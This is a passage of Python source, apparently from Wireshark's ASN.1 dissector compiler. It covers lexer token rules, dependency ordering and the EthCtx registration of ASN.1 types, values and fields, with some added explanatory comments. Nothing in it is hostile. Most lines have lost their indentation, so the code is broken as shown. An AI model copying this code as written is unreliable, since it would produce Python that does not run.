'IMPORTS' : 'IMPORTS',
'INCLUDES' : 'INCLUDES',
'INSTANCE' : 'INSTANCE',
'INTEGER' : 'INTEGER',
'INTERSECTION' : 'INTERSECTION',
'MAX' : 'MAX',
'MIN' : 'MIN',
'MINUS-INFINITY' : 'MINUS_INFINITY',
'NULL' : 'NULL',
'OBJECT' : 'OBJECT',
'ObjectDescriptor' : 'ObjectDescriptor',
'OCTET' : 'OCTET',
'OF' : 'OF',
'OPTIONAL' : 'OPTIONAL',
'PATTERN' : 'PATTERN',
'PDV' : 'PDV',
'PLUS-INFINITY' : 'PLUS_INFINITY',
'PRESENT' : 'PRESENT',
'PRIVATE' : 'PRIVATE',
'REAL' : 'REAL',
'RELATIVE-OID' : 'RELATIVE_OID',
'SEQUENCE' : 'SEQUENCE',
'SET' : 'SET',
'SIZE' : 'SIZE',
'STRING' : 'STRING',
'SYNTAX' : 'SYNTAX',
'TAGS' : 'TAGS',
'TRUE' : 'TRUE',
'TYPE-IDENTIFIER' : 'TYPE_IDENTIFIER',
'UNION' : 'UNION',
'UNIQUE' : 'UNIQUE',
'UNIVERSAL' : 'UNIVERSAL',
'UTCTime' : 'UTCTime',
'WITH' : 'WITH',
# X.208 obsolete but still used
'ANY' : 'ANY',
'DEFINED' : 'DEFINED',
}
for k in list(static_tokens.keys()):
    if static_tokens [k] is None:
        static_tokens [k] = k
StringTypes = ['Numeric', 'Printable', 'IA5', 'BMP', 'Universal', 'UTF8',
'Teletex', 'T61', 'Videotex', 'Graphic', 'ISO646', 'Visible',
'General']
for s in StringTypes:
reserved_words[s + 'String'] = s + 'String'
tokens = list(static_tokens.values()) \
+ list(reserved_words.values()) \
+ ['BSTRING', 'HSTRING', 'QSTRING',
'UCASE_IDENT', 'LCASE_IDENT', 'LCASE_IDENT_ASSIGNED', 'CLASS_IDENT',
'REAL_NUMBER', 'NUMBER', 'PYQUOTE']
cur_mod = __import__ (__name__) # XXX blech!
for (k, v) in list(static_tokens.items ()):
cur_mod.__dict__['t_' + v] = k
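# Note (added): PLY's lexer collects token rules from module-level names that
# start with 't_', so the loop above exposes each static regex as such a name.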
# 11.10 Binary strings
def t_BSTRING (t):
r"'[01]*'B"
return t
# 11.12 Hexadecimal strings
def t_HSTRING (t):
r"'[0-9A-Fa-f]*'H"
return t
def t_QSTRING (t):
r'"([^"]|"")*"'
return t
def t_UCASE_IDENT (t):
r"[A-Z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
if (is_class_ident(t.value)): t.type = 'CLASS_IDENT'
if (is_class_syntax(t.value)): t.type = t.value
t.type = reserved_words.get(t.value, t.type)
return t
lcase_ident_assigned = {}
def t_LCASE_IDENT (t):
r"[a-z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
if (not in_oid and (t.value in lcase_ident_assigned)): t.type = 'LCASE_IDENT_ASSIGNED'
return t
# 11.9 Real numbers
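# The trailing (?!\.) lookahead keeps a range like "1..5" from being lexed as
# a REAL_NUMBER; it is tokenized as NUMBER RANGE NUMBER instead (added note).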
def t_REAL_NUMBER (t):
r"[0-9]+\.[0-9]*(?!\.)"
return t
# 11.8 Numbers
def t_NUMBER (t):
r"0|([1-9][0-9]*)"
return t
# 11.6 Comments
pyquote_str = 'PYQUOTE'
def t_COMMENT(t):
r"--(-[^\-\n]|[^\-\n])*(--|\n|-\n|$|-$)"
if (t.value.find("\n") >= 0) : t.lexer.lineno += 1
if t.value[2:2+len (pyquote_str)] == pyquote_str:
t.value = t.value[2+len(pyquote_str):]
t.value = t.value.lstrip ()
t.type = pyquote_str
return t
return None
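# Illustrative (added note): the ASN.1 comment "--PYQUOTE import foo" becomes
# a PYQUOTE token with value "import foo"; ordinary comments return None and
# are therefore discarded by the lexer.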
t_ignore = " \t\r"
def t_NEWLINE(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_error(t):
global input_file
raise LexError(t, input_file)
# state 'braceignore'
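# The exclusive 'braceignore' state (added note) swallows a balanced { ... }
# block while tracking nesting depth in t.lexer.level and returns only the
# closing RBRACE token; everything inside the braces is skipped.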
def t_braceignore_lbrace(t):
r'\{'
t.lexer.level +=1
def t_braceignore_rbrace(t):
r'\}'
t.lexer.level -=1
# If closing brace, return token
if t.lexer.level == 0:
t.type = 'RBRACE'
return t
def t_braceignore_QSTRING (t):
r'"([^"]|"")*"'
t.lexer.lineno += t.value.count("\n")
def t_braceignore_COMMENT(t):
r"--(-[^\-\n]|[^\-\n])*(--|\n|-\n|$|-$)"
if (t.value.find("\n") >= 0) : t.lexer.lineno += 1
def t_braceignore_nonspace(t):
r'[^\s\{\}\"-]+|-(?!-)'
t_braceignore_ignore = " \t\r"
def t_braceignore_NEWLINE(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_braceignore_error(t):
t.lexer.skip(1)
class Ctx:
def __init__ (self, defined_dict, indent = 0):
self.tags_def = 'EXPLICIT' # default = explicit
self.indent_lev = 0
self.assignments = {}
self.dependencies = {}
self.pyquotes = []
self.defined_dict = defined_dict
self.name_ctr = 0
def spaces (self):
return " " * (4 * self.indent_lev)
def indent (self):
self.indent_lev += 1
def outdent (self):
self.indent_lev -= 1
assert (self.indent_lev >= 0)
def register_assignment (self, ident, val, dependencies):
if ident in self.assignments:
raise DuplicateError("assignment", ident)
if ident in self.defined_dict:
raise Exception("cross-module duplicates for %s" % ident)
self.defined_dict [ident] = 1
self.assignments[ident] = val
self.dependencies [ident] = dependencies
return ""
# return "#%s depends on %s" % (ident, str (dependencies))
def register_pyquote (self, val):
self.pyquotes.append (val)
return ""
def output_assignments (self):
already_output = {}
text_list = []
assign_keys = list(self.assignments.keys())
to_output_count = len (assign_keys)
while True:
any_output = 0
for (ident, val) in list(self.assignments.items ()):
if ident in already_output:
continue
ok = 1
for d in self.dependencies [ident]:
if ((d not in already_output) and
(d in assign_keys)):
ok = 0
if ok:
text_list.append ("%s=%s" % (ident,
self.assignments [ident]))
already_output [ident] = 1
any_output = 1
to_output_count -= 1
assert (to_output_count >= 0)
if not any_output:
if to_output_count == 0:
break
# OK, we detected a cycle
cycle_list = []
for ident in list(self.assignments.keys ()):
if ident not in already_output:
depend_list = [d for d in self.dependencies[ident] if d in assign_keys]
cycle_list.append ("%s(%s)" % (ident, ",".join (depend_list)))
text_list.append ("# Cycle XXX " + ",".join (cycle_list))
for (ident, val) in list(self.assignments.items ()):
if ident not in already_output:
text_list.append ("%s=%s" % (ident, self.assignments [ident]))
break
return "\n".join (text_list)
def output_pyquotes (self):
return "\n".join (self.pyquotes)
def make_new_name (self):
self.name_ctr += 1
return "_compiler_generated_name_%d" % (self.name_ctr,)
#--- Flags for EXPORT, USER_DEFINED, NO_EMIT, MAKE_ENUM -------------------------------
EF_TYPE = 0x0001
EF_VALS = 0x0002
EF_ENUM = 0x0004
EF_WS_DLL = 0x0010 # exported from shared library
EF_EXTERN = 0x0020
EF_NO_PROT = 0x0040
EF_NO_TYPE = 0x0080
EF_UCASE = 0x0100
EF_TABLE = 0x0400
EF_DEFINE = 0x0800
EF_MODULE = 0x1000
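# These flags combine bitwise (added note); e.g. (EF_TYPE | EF_VALS) marks
# both the dissector function and its value_string table, as used for the
# 'user_def' and 'no_emit' defaults below.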
#--- common dependency computation ---
# Input : list of items
# dictionary with lists of dependency
#
#
# Output : list of two outputs:
# [0] list of items in dependency
# [1] list of cycle dependency cycles
def dependency_compute(items, dependency, map_fn = lambda t: t, ignore_fn = lambda t: False):
item_ord = []
item_cyc = []
x = {} # already emitted
#print '# Dependency computation'
for t in items:
if map_fn(t) in x:
        #print 'Continue: %s : %s' % (t, map_fn(t))
continue
stack = [t]
stackx = {t : dependency.get(t, [])[:]}
#print 'Push: %s : %s' % (t, str(stackx[t]))
while stack:
if stackx[stack[-1]]: # has dependencies
d = stackx[stack[-1]].pop(0)
if map_fn(d) in x or ignore_fn(d):
continue
if d in stackx: # cyclic dependency
c = stack[:]
c.reverse()
c = [d] + c[0:c.index(d)+1]
c.reverse()
item_cyc.append(c)
#print 'Cyclic: %s ' % (' -> '.join(c))
continue
stack.append(d)
stackx[d] = dependency.get(d, [])[:]
#print 'Push: %s : %s' % (d, str(stackx[d]))
else:
#print 'Pop: %s' % (stack[-1])
del stackx[stack[-1]]
e = map_fn(stack.pop())
if e in x:
continue
#print 'Add: %s' % (e)
item_ord.append(e)
x[e] = True
return (item_ord, item_cyc)
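# Illustrative self-check (added, not in the original source):
#   dependency_compute(['A', 'B', 'C'], {'A': ['B'], 'B': ['C'], 'C': ['B']})
# returns (['C', 'B', 'A'], [['B', 'C', 'B']]) - the items in dependency
# order plus the detected B -> C -> B cycle.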
# Given a filename, return a relative path from epan/dissectors
def rel_dissector_path(filename):
path_parts = os.path.abspath(filename).split(os.sep)
while (len(path_parts) > 3 and path_parts[0] != 'asn1'):
path_parts.pop(0)
path_parts.insert(0, '..')
path_parts.insert(0, '..')
return '/'.join(path_parts)
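# Illustrative (added; assumes a POSIX path):
#   rel_dissector_path('/src/wireshark/asn1/x509af/x509af.cnf')
# returns '../../asn1/x509af/x509af.cnf'.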
#--- EthCtx -------------------------------------------------------------------
class EthCtx:
def __init__(self, conform, output, indent = 0):
self.conform = conform
self.output = output
self.conform.ectx = self
self.output.ectx = self
self.encoding = 'per'
self.aligned = False
self.default_oid_variant = ''
self.default_opentype_variant = ''
self.default_containing_variant = '_pdu_new'
self.default_embedded_pdv_cb = None
self.default_external_type_cb = None
self.remove_prefix = None
self.srcdir = None
self.emitted_pdu = {}
self.module = {}
self.module_ord = []
self.all_type_attr = {}
self.all_tags = {}
self.all_vals = {}
def encp(self): # encoding protocol
encp = self.encoding
return encp
# Encoding
def Per(self): return self.encoding == 'per'
def Ber(self): return self.encoding == 'ber'
def Aligned(self): return self.aligned
def Unaligned(self): return not self.aligned
def NeedTags(self): return self.tag_opt or self.Ber()
def NAPI(self): return False # disable planned features
def Module(self): # current module name
return self.modules[-1][0]
def groups(self):
return self.group_by_prot or (self.conform.last_group > 0)
def dbg(self, d):
if (self.dbgopt.find(d) >= 0):
return True
else:
return False
def value_max(self, a, b):
        if (a == 'MAX') or (b == 'MAX'): return 'MAX'
        if a == 'MIN': return b
        if b == 'MIN': return a
try:
if (int(a) > int(b)):
return a
else:
return b
except (ValueError, TypeError):
pass
return "MAX((%s),(%s))" % (a, b)
def value_min(self, a, b):
        if (a == 'MIN') or (b == 'MIN'): return 'MIN'
        if a == 'MAX': return b
        if b == 'MAX': return a
try:
if (int(a) < int(b)):
return a
else:
return b
except (ValueError, TypeError):
pass
return "MIN((%s),(%s))" % (a, b)
def value_get_eth(self, val):
if isinstance(val, Value):
return val.to_str(self)
ethname = val
if val in self.value:
ethname = self.value[val]['ethname']
return ethname
def value_get_val(self, nm):
val = asn2c(nm)
if nm in self.value:
if self.value[nm]['import']:
v = self.get_val_from_all(nm, self.value[nm]['import'])
if v is None:
msg = 'Need value of imported value identifier %s from %s (%s)' % (nm, self.value[nm]['import'], self.value[nm]['proto'])
warnings.warn_explicit(msg, UserWarning, '', 0)
else:
val = v
else:
val = self.value[nm]['value']
if isinstance (val, Value):
val = val.to_str(self)
else:
msg = 'Need value of unknown value identifier %s' % (nm)
warnings.warn_explicit(msg, UserWarning, '', 0)
return val
def eth_get_type_attr(self, type):
#print "eth_get_type_attr(%s)" % (type)
types = [type]
while (not self.type[type]['import']):
val = self.type[type]['val']
#print val
ttype = type
while (val.type == 'TaggedType'):
val = val.val
ttype += '/' + UNTAG_TYPE_NAME
if (val.type != 'Type_Ref'):
if (type != ttype):
types.append(ttype)
break
type = val.val
types.append(type)
attr = {}
#print " ", types
while len(types):
t = types.pop()
if (self.type[t]['import']):
attr.update(self.type[t]['attr'])
attr.update(self.eth_get_type_attr_from_all(t, self.type[t]['import']))
elif (self.type[t]['val'].type == 'SelectionType'):
val = self.type[t]['val']
(ftype, display) = val.eth_ftype(self)
                attr.update({ 'TYPE' : ftype, 'DISPLAY' : display,
                              'STRINGS' : val.eth_strings(), 'BITMASK' : '0' })
else:
attr.update(self.type[t]['attr'])
attr.update(self.eth_type[self.type[t]['ethname']]['attr'])
#print " ", attr
return attr
def eth_get_type_attr_from_all(self, type, module):
attr = {}
if module in self.all_type_attr and type in self.all_type_attr[module]:
attr = self.all_type_attr[module][type]
return attr
def get_ttag_from_all(self, type, module):
ttag = None
if module in self.all_tags and type in self.all_tags[module]:
ttag = self.all_tags[module][type]
return ttag
def get_val_from_all(self, nm, module):
val = None
if module in self.all_vals and nm in self.all_vals[module]:
val = self.all_vals[module][nm]
return val
def get_obj_repr(self, ident, flds=[], not_flds=[]):
def set_type_fn(cls, field, fnfield):
obj[fnfield + '_fn'] = 'NULL'
obj[fnfield + '_pdu'] = 'NULL'
if field in val and isinstance(val[field], Type_Ref):
p = val[field].eth_type_default_pars(self, '')
obj[fnfield + '_fn'] = p['TYPE_REF_FN']
obj[fnfield + '_fn'] = obj[fnfield + '_fn'] % p # one iteration
if (self.conform.check_item('PDU', cls + '.' + field)):
obj[fnfield + '_pdu'] = 'dissect_' + self.field[val[field].val]['ethname']
return
        # end of set_type_fn()
obj = { '_name' : ident, '_ident' : asn2c(ident)}
obj['_class'] = self.oassign[ident].cls
obj['_module'] = self.oassign[ident].module
val = self.oassign[ident].val
for f in flds:
if f not in val:
return None
for f in not_flds:
if f in val:
return None
for f in list(val.keys()):
if isinstance(val[f], Node):
obj[f] = val[f].fld_obj_repr(self)
else:
obj[f] = str(val[f])
if (obj['_class'] == 'TYPE-IDENTIFIER') or (obj['_class'] == 'ABSTRACT-SYNTAX'):
set_type_fn(obj['_class'], '&Type', '_type')
if (obj['_class'] == 'OPERATION'):
set_type_fn(obj['_class'], '&ArgumentType', '_argument')
set_type_fn(obj['_class'], '&ResultType', '_result')
if (obj['_class'] == 'ERROR'):
set_type_fn(obj['_class'], '&ParameterType', '_parameter')
return obj
#--- eth_reg_module -----------------------------------------------------------
def eth_reg_module(self, module):
#print "eth_reg_module(module='%s')" % (module)
name = module.get_name()
self.modules.append([name, module.get_proto(self)])
if name in self.module:
raise DuplicateError("module", name)
self.module[name] = []
self.module_ord.append(name)
#--- eth_module_dep_add ------------------------------------------------------------
def eth_module_dep_add(self, module, dep):
self.module[module].append(dep)
#--- eth_exports ------------------------------------------------------------
def eth_exports(self, exports):
self.exports_all = False
if ((len(exports) == 1) and (exports[0] == 'ALL')):
self.exports_all = True
return
for e in (exports):
if isinstance(e, Type_Ref):
self.exports.append(e.val)
elif isinstance(e, Class_Ref):
self.cexports.append(e.val)
else:
self.vexports.append(e)
#--- eth_reg_assign ---------------------------------------------------------
def eth_reg_assign(self, ident, val, virt=False):
#print "eth_reg_assign(ident='%s')" % (ident)
if ident in self.assign:
raise DuplicateError("assignment", ident)
self.assign[ident] = { 'val' : val , 'virt' : virt }
self.assign_ord.append(ident)
if (self.exports_all):
self.exports.append(ident)
#--- eth_reg_vassign --------------------------------------------------------
def eth_reg_vassign(self, vassign):
ident = vassign.ident
#print "eth_reg_vassign(ident='%s')" % (ident)
if ident in self.vassign:
raise DuplicateError("value assignment", ident)
self.vassign[ident] = vassign
self.vassign_ord.append(ident)
if (self.exports_all):
self.vexports.append(ident)
#--- eth_reg_oassign --------------------------------------------------------
def eth_reg_oassign(self, oassign):
ident = oassign.ident
#print "eth_reg_oassign(ident='%s')" % (ident)
if ident in self.oassign:
if self.oassign[ident] == oassign:
return # OK - already defined
else:
raise DuplicateError("information object assignment", ident)
self.oassign[ident] = oassign
self.oassign_ord.append(ident)
self.oassign_cls.setdefault(oassign.cls, []).append(ident)
#--- eth_import_type --------------------------------------------------------
def eth_import_type(self, ident, mod, proto):
#print "eth_import_type(ident='%s', mod='%s', prot='%s')" % (ident, mod, proto)
if ident in self.type:
#print "already defined '%s' import=%s, module=%s" % (ident, str(self.type[ident]['import']), self.type[ident].get('module', '-'))
if not self.type[ident]['import'] and (self.type[ident]['module'] == mod) :
return # OK - already defined
elif self.type[ident]['import'] and (self.type[ident]['import'] == mod) :
return # OK - already imported
else:
raise DuplicateError("type", ident)
self.type[ident] = {'import' : mod, 'proto' : proto,
'ethname' : '' }
self.type[ident]['attr'] = { 'TYPE' : 'FT_NONE', 'DISPLAY' : 'BASE_NONE',
'STRINGS' : 'NULL', 'BITMASK' : '0' }
mident = "$%s$%s" % (mod, ident)
if (self.conform.check_item('TYPE_ATTR', mident)):
self.type[ident]['attr'].update(self.conform.use_item('TYPE_ATTR', mident))
else:
self.type[ident]['attr'].update(self.conform.use_item('TYPE_ATTR', ident))
if (self.conform.check_item('IMPORT_TAG', mident)):
self.conform.copy_item('IMPORT_TAG', ident, mident)
self.type_imp.append(ident)
#--- dummy_import_type --------------------------------------------------------
def dummy_import_type(self, ident):
# dummy imported
if ident in self.type:
raise Exception("Try to dummy import for existing type :%s" % ident)
ethtype = asn2c(ident)
self.type[ident] = {'import' : 'xxx', 'proto' : 'xxx',
'ethname' : ethtype }
self.type[ident]['attr'] = { 'TYPE' : 'FT_NONE', 'DISPLAY' : 'BASE_NONE',
'STRINGS' : 'NULL', 'BITMASK' : '0' }
self.eth_type[ethtype] = { 'import' : 'xxx', 'proto' : 'xxx' , 'attr' : {}, 'ref' : []}
print("Dummy imported: %s (%s)" % (ident, ethtype))
return ethtype
#--- eth_import_class --------------------------------------------------------
def eth_import_class(self, ident, mod, proto):
#print "eth_import_class(ident='%s', mod='%s', prot='%s')" % (ident, mod, proto)
if ident in self.objectclass:
#print "already defined import=%s, module=%s" % (str(self.objectclass[ident]['import']), self.objectclass[ident]['module'])
if not self.objectclass[ident]['import'] and (self.objectclass[ident]['module'] == mod) :
return # OK - already defined
elif self.objectclass[ident]['import'] and (self.objectclass[ident]['import'] == mod) :
return # OK - already imported
else:
raise DuplicateError("object class", ident)
self.objectclass[ident] = {'import' : mod, 'proto' : proto,
'ethname' : '' }
self.objectclass_imp.append(ident)
#--- eth_import_value -------------------------------------------------------
def eth_import_value(self, ident, mod, proto):
#print "eth_import_value(ident='%s', mod='%s', prot='%s')" % (ident, mod, prot)
if ident in self.value:
#print "already defined import=%s, module=%s" % (str(self.value[ident]['import']), self.value[ident]['module'])
if not self.value[ident]['import'] and (self.value[ident]['module'] == mod) :
return # OK - already defined
elif self.value[ident]['import'] and (self.value[ident]['import'] == mod) :
return # OK - already imported
else:
raise DuplicateError("value", ident)
self.value[ident] = {'import' : mod, 'proto' : proto,
'ethname' : ''}
self.value_imp.append(ident)
#--- eth_sel_req ------------------------------------------------------------
def eth_sel_req(self, typ, sel):
key = typ + '.' + sel
if key not in self.sel_req:
self.sel_req[key] = { 'typ' : typ , 'sel' : sel}
self.sel_req_ord.append(key)
return key
#--- eth_comp_req ------------------------------------------------------------
def eth_comp_req(self, type):
self.comp_req_ord.append(type)
#--- eth_dep_add ------------------------------------------------------------
def eth_dep_add(self, type, dep):
if type not in self.type_dep:
self.type_dep[type] = []
self.type_dep[type].append(dep)
#--- eth_reg_type -----------------------------------------------------------
def eth_reg_type(self, ident, val):
#print "eth_reg_type(ident='%s', type='%s')" % (ident, val.type)
if ident in self.type:
if self.type[ident]['import'] and (self.type[ident]['import'] == self.Module()) :
# replace imported type
del self.type[ident]
self.type_imp.remove(ident)
else:
raise DuplicateError("type", ident)
val.ident = ident
self.type[ident] = { 'val' : val, 'import' : None }
self.type[ident]['module'] = self.Module()
self.type[ident]['proto'] = self.proto
if len(ident.split('/')) > 1:
self.type[ident]['tname'] = val.eth_tname()
else:
self.type[ident]['tname'] = asn2c(ident)
self.type[ident]['export'] = self.conform.use_item('EXPORTS', ident)
self.type[ident]['enum'] = self.conform.use_item('MAKE_ENUM', ident)
self.type[ident]['vals_ext'] = self.conform.use_item('USE_VALS_EXT', ident)
self.type[ident]['user_def'] = self.conform.use_item('USER_DEFINED', ident)
self.type[ident]['no_emit'] = self.conform.use_item('NO_EMIT', ident)
self.type[ident]['tname'] = self.conform.use_item('TYPE_RENAME', ident, val_dflt=self.type[ident]['tname'])
self.type[ident]['ethname'] = ''
if (val.type == 'Type_Ref') or (val.type == 'TaggedType') or (val.type == 'SelectionType') :
self.type[ident]['attr'] = {}
else:
(ftype, display) = val.eth_ftype(self)
self.type[ident]['attr'] = { 'TYPE' : ftype, 'DISPLAY' : display,
'STRINGS' : val.eth_strings(), 'BITMASK' : '0' }
self.type[ident]['attr'].update(self.conform.use_item('TYPE_ATTR', ident))
self.type_ord.append(ident)
# PDU
if (self.conform.check_item('PDU', ident)):
self.eth_reg_field(ident, ident, impl=val.HasImplicitTag(self), pdu=self.conform.use_item('PDU', ident))
#--- eth_reg_objectclass ----------------------------------------------------------
def eth_reg_objectclass(self, ident, val):
#print "eth_reg_objectclass(ident='%s')" % (ident)
if ident in self.objectclass:
if self.objectclass[ident]['import'] and (self.objectclass[ident]['import'] == self.Module()) :
# replace imported object class
del self.objectclass[ident]
self.objectclass_imp.remove(ident)
elif isinstance(self.objectclass[ident]['val'], Class_Ref) and \
isinstance(val, Class_Ref) and \
(self.objectclass[ident]['val'].val == val.val):
pass # ignore duplicated CLASS1 ::= CLASS2
else:
raise DuplicateError("object class", ident)
self.objectclass[ident] = { 'import' : None, 'module' : self.Module(), 'proto' : self.proto }
self.objectclass[ident]['val'] = val
self.objectclass[ident]['export'] = self.conform.use_item('EXPORTS', ident)
self.objectclass_ord.append(ident)
#--- eth_reg_value ----------------------------------------------------------
def eth_reg_value(self, ident, type, value, ethname=None):
#print "eth_reg_value(ident='%s')" % (ident)
if ident in self.value:
if self.value[ident]['import'] and (self.value[ident]['import'] == self.Module()) :
# replace imported value
del self.value[ident]
self.value_imp.remove(ident)
elif ethname:
self.value[ident]['ethname'] = ethname
return
else:
raise DuplicateError("value", ident)
self.value[ident] = { 'import' : None, 'module' : self.Module(), 'proto' : self.proto,
'type' : type, 'value' : value,
'no_emit' : False }
self.value[ident]['export'] = self.conform.use_item('EXPORTS', ident)
self.value[ident]['ethname'] = ''
if (ethname): self.value[ident]['ethname'] = ethname
self.value_ord.append(ident)
#--- eth_reg_field ----------------------------------------------------------
def eth_reg_field(self, ident, type, idx='', parent=None, impl=False, pdu=None):
#print "eth_reg_field(ident='%s', type='%s')" % (ident, type)
if ident in self.field:
if pdu and (type == self.field[ident]['type']):
pass # OK already created PDU
else:
raise DuplicateError("field", ident)
self.field[ident] = {'type' : type, 'idx' : idx, 'impl' : impl, 'pdu' : pdu,
'modified' : '', 'attr' : {} }
name = ident.split('/')[-1]
if self.remove_prefix and name.startswith(self.remove_prefix):
name = name[len(self.remove_prefix):]
if len(ident.split('/')) > 1 and name == ITEM_FIELD_NAME: # Sequence/Set of type
if len(self.field[ident]['type'].split('/')) > 1:
self.field[ident]['attr']['NAME'] = '"%s item"' % ident.split('/')[-2]
self.field[ident]['attr']['ABBREV'] = asn2c(ident.split('/')[-2] + name)
else:
self.field[ident]['attr']['NAME'] = '"%s"' % self.field[ident]['type']
self.field[ident]['attr']['ABBREV'] = asn2c(self.field[ident]['type'])
else:
self.field[ident]['attr']['NAME'] = '"%s"' % name
self.field[ident]['attr']['ABBREV'] = asn2c(name)
if self.conform.check_item('FIELD_ATTR', ident):
self.field[ident]['modified'] = '#' + str(id(self))
self.field[ident]['attr'].update(self.conform.use_item('FIELD_ATTR', ident))
if (pdu):
self.field[ident]['pdu']['export'] = (self.conform.use_item('EXPORTS', ident + '_PDU') != 0)
self.pdu_ord.append(ident)
else:
self.field_ord.append(ident)
if parent:
self.eth_dep_add(parent, type)
def eth_dummy_eag_field_required(self):
if (not self.dummy_eag_field):
self.dummy_eag_field = 'eag_field'
#--- eth_clean --------------------------------------------------------------
def eth_clean(self):
        self.proto = self.proto_opt
#--- ASN.1 tables ----------------
self.assign = {}
self.assign_ord = []
self.field = {}
self.pdu_ord = []
self.field_ord = []
self.type = {}
self.type_ord = []
self.type_imp = []
self.type_dep = {}
self.sel_req = {}
self.sel_req_ord = []
self.comp_req_ord = []
self.vassign = {}
self.vassign_ord = []
self.value = {}
self.value_ord = []
self.value_imp = []
self.objectclass = {}
self.objectclass_ord = []
self.objectclass_imp = []
self.oassign = {}
self.oassign_ord = []
self.oassign_cls = {}
#--- Modules ------------
self.modules = []
self.exports_all = False
self.exports = []
self.cexports = []
self.vexports = []
#--- types -------------------
self.eth_type = {}
self.eth_type_ord = []
self.eth_export_ord = []
self.eth_type_dupl = {}
self.named_bit = []
#--- value dependencies -------------------
self.value_dep = {}
#--- values -------------------
self.eth_value = {}
self.eth_value_ord = []
#--- fields -------------------------
self.eth_hf = {}
self.eth_hf_ord = []
self.eth_hfpdu_ord = []
self.eth_hf_dupl = {}
self.dummy_eag_field = None
#--- type dependencies -------------------
self.eth_type_ord1 = []
self.eth_dep_cycle = []
self.dep_cycle_eth_type = {}
#--- value dependencies and export -------------------
self.eth_value_ord1 = []
self.eth_vexport_ord = []
#--- eth_prepare ------------------------------------------------------------
def eth_prepare(self):
self.eproto = asn2c(self.proto)
#--- dummy types/fields for PDU registration ---
nm = 'NULL'
if (self.conform.check_item('PDU', nm)):
self.eth_reg_type('_dummy/'+nm, NullType())
self.eth_reg_field(nm, '_dummy/'+nm, pdu=self.conform.use_item('PDU', nm))
#--- required PDUs ----------------------------
for t in self.type_ord:
pdu = self.type[t]['val'].eth_need_pdu(self)
if not pdu: continue
f = pdu['type']
pdu['reg'] = None
pdu['hidden'] = False
pdu['need_decl'] = True
if f not in self.field:
self.eth_reg_field(f, f, pdu=pdu)
#--- values -> named values -------------------
t_for_update = {}
for v in self.value_ord:
if (self.value[v]['type'].type == 'Type_Ref') or self.conform.check_item('ASSIGN_VALUE_TO_TYPE', v):
if self.conform.check_item('ASSIGN_VALUE_TO_TYPE', v):
tnm = self.conform.use_item('ASSIGN_VALUE_TO_TYPE', v)
else:
tnm = self.value[v]['type'].val
if tnm in self.type \
and not self.type[tnm]['import'] \
and (self.type[tnm]['val'].type == 'IntegerType'):
self.type[tnm]['val'].add_named_value(v, self.value[v]['value'])
self.value[v]['no_emit'] = True
t_for_update[tnm] = True
for t in list(t_for_update.keys()):
self.type[t]['attr']['STRINGS'] = self.type[t]['val'].eth_strings()
self.type[t]['attr'].update(self.conform.use_item('TYPE_ATTR', t))
#--- required components of ---------------------------
#print "self.comp_req_ord = ", self.comp_req_ord
for t in self.comp_req_ord:
self.type[t]['val'].eth_reg_sub(t, self, components_available=True)
#--- required selection types ---------------------------
#print "self.sel_req_ord = ", self.sel_req_ord
for t in self.sel_req_ord:
tt = self.sel_req[t]['typ']
if tt not in self.type:
self.dummy_import_type(t)
elif self.type[tt]['import']:
self.eth_import_type(t, self.type[tt]['import'], self.type[tt]['proto'])
else:
self.type[tt]['val'].sel_req(t, self.sel_req[t]['sel'], self)
#--- types -------------------
for t in self.type_imp: # imported types
nm = asn2c(t)
self.eth_type[nm] = { 'import' : self.type[t]['import'],
'proto' : asn2c(self.type[t]['proto']),
'attr' : {}, 'ref' : []}
self.eth_type[nm]['attr'].update(self.conform.use_item('ETYPE_ATTR', nm))
self.type[t]['ethname'] = nm
for t in self.type_ord: # dummy import for missing type reference
tp = self.type[t]['val']
#print "X : %s %s " % (t, tp.type)
if isinstance(tp, TaggedType):
#print "%s : %s " % (tp.type, t)
tp = tp.val
if isinstance(tp, Type_Ref):
#print "%s : %s ::= %s " % (tp.type, t, tp.val)
if tp.val not in self.type:
self.dummy_import_type(tp.val)
for t in self.type_ord:
nm = self.type[t]['tname']
if ((nm.find('#') >= 0) or
((len(t.split('/'))>1) and
(self.conform.get_fn_presence(t) or self.conform.check_item('FN_PARS', t) or
self.conform.get_fn_presence('/'.join((t,ITEM_FIELD_NAME))) or self.conform.check_item('FN_PARS', '/'.join((t,ITEM_FIELD_NAME)))) and
not self.conform.check_item('TYPE_RENAME', t))):
if len(t.split('/')) == 2 and t.split('/')[1] == ITEM_FIELD_NAME: # Sequence of type at the 1st level
nm = t.split('/')[0] + t.split('/')[1]
elif t.split('/')[-1] == ITEM_FIELD_NAME: # Sequence/Set of type at next levels
nm = 'T_' + self.conform.use_item('FIELD_RENAME', '/'.join(t.split('/')[0:-1]), val_dflt=t.split('/')[-2]) + t.split('/')[-1]
elif t.split('/')[-1] == UNTAG_TYPE_NAME: # Untagged type
nm = self.type['/'.join(t.split('/')[0:-1])]['ethname'] + '_U'
else:
nm = 'T_' + self.conform.use_item('FIELD_RENAME', t, val_dflt=t.split('/')[-1])
nm = asn2c(nm)
if nm in self.eth_type:
if nm in self.eth_type_dupl:
self.eth_type_dupl[nm].append(t)
else:
self.eth_type_dupl[nm] = [self.eth_type[nm]['ref'][0], t]
nm += '_%02d' % (len(self.eth_type_dupl[nm])-1)
if nm in self.eth_type:
self.eth_type[nm]['ref'].append(t)
else:
self.eth_type_ord.append(nm)
self.eth_type[nm] = { 'import' : None, 'proto' : self.eproto, 'export' : 0, 'enum' : 0, 'vals_ext' : 0,
'user_def' : EF_TYPE|EF_VALS, 'no_emit' : EF_TYPE|EF_VALS,
'val' : self.type[t]['val'],
'attr' : {}, 'ref' : [t]}
self.type[t]['ethname'] = nm
if (not self.eth_type[nm]['export'] and self.type[t]['export']): # new export
self.eth_export_ord.append(nm)
self.eth_type[nm]['export'] |= self.type[t]['export']
self.eth_type[nm]['enum'] |= self.type[t]['enum']
self.eth_type[nm]['vals_ext'] |= self.type[t]['vals_ext']
self.eth_type[nm]['user_def'] &= self.type[t]['user_def']
self.eth_type[nm]['no_emit'] &= self.type[t]['no_emit']
if self.type[t]['attr'].get('STRINGS') == '$$':
use_ext = self.type[t]['vals_ext']
if (use_ext):
self.eth_type[nm]['attr']['STRINGS'] = '&%s_ext' % (self.eth_vals_nm(nm))
else:
self.eth_type[nm]['attr']['STRINGS'] = 'VALS(%s)' % (self.eth_vals_nm(nm))
